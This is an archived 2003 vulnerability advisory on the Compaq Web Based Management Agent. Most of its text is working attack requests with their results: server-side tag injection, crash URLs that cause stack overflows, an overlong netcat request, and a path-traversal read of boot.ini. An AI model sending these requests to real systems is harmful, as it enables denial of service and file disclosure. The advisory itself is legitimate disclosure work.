what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

compaq.txt

compaq.txt
Posted Jun 30, 2003
Authored by Ian Vitek

The Compaq Web Based Management Agent is vulnerable to server side injection, stack overflows, access violations, and creation of script objects.

tags | exploit, web, overflow
SHA-256 | 1ac95b0059ba56c29c2e4bf897039346c99782f06b42f3096586c5b7e9ba6ee1

compaq.txt

Change Mirror Download
SSI vulnerability in Compaq Web Based Management Agent
======================================================

Type of vulnerabilities:
Server Side Include injection. Exploitable.
Stack overflows and access violations. Exploitable?
Creation of script objects. Exploitable?

Affected Software: Compaq Web Based Management Agent
Verified Platforms: Windows

Background and problem description
==================================
Bashis (bash at wcd.se) has found several vulnerabilities
in Compaq Web Based Management Agent. This Agent runs on
TCP port 2301 (HTTP) or 2381 (HTTPS).
The agent uses "tags" to run funktions at the server side.
To list all tags:
http://IP:2301/<!.TableDisplayTags>

To crash the agent:
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!>
Stack overflow (0xc00000fd), Address: 0x10039869

This crashes the agent too:
http://IP:2301/<!.StringRedirecturl>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc
http://IP:2301/survey/<!.StringHttpRequest=Url>
Stack overflow (0xc00000fd), Address: 0x10039869

The cause could be an endless loop (the result
contains a tag to display an URL, and the result
contains a tag to display an URL, and the result...)

More strange stack overflows:
http://IP:2301/<!.ObjectIsapiECB>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Many tags take input that seems vulnerable:
http://IP:2301/<!.StringIsapiECB=lpszPathInfo>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Netcat following:
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0
Access violation (0xc0000005), Address: 0x100368a5

Check file existens. (with a nice 'input box')
http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It looks like you could create script objects.
Check the tags with <!.TableDisplayTags>. Some of the
CreateObject tags has the parameter 'script'.
I don't know if it could be done though.

Is this just another remote DoS?

I have mailed HP (security-alert@hp.com) and got an automated
response 28/5 2003.

If someone want to forward this mail they may do so.

To all of my friends; See you in Vegas!
The Swedes are comming.
//Ian Vitek

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close